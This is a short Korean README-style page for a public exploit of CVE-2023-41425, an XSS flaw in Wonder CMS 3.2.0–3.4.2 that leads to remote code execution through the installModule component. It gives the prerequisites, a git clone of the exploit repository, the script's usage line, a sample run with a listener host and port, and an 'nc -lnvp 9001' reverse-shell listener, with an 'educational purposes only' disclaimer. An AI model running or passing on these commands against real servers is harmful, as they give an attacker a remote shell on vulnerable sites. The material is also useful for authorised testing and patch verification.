
CVE-2023-41425 - Wonder CMS v.3.2.0 ~ v.3.4.2의 교차 사이트 스크립팅(XSS) 취약점으로, 원격 공격자가 installModule 구성 요소에 업로드된 조작된 스크립트를 통해 임의 코드를 실행할 수 있습니다.
Wonder CMS v.3.2.0 ~ v.3.4.2의 XSS(Cross Site Scripting) 취약점으로 인해 원격 공격자가 installModule 컴포넌트에 업로드된 조작된 스크립트를 통해 임의 코드를 실행할 수 있습니다. 교육 목적으로만 사용하세요
loginURL에 대한 정보, 관리자 접근 권한, 또는 관리자가 XSS 링크를 클릭하도록 유도할 수 있는 능력이 필요합니다.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

취약점을 발견하고 보고한 prodigiousMind에게 감사드립니다 https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413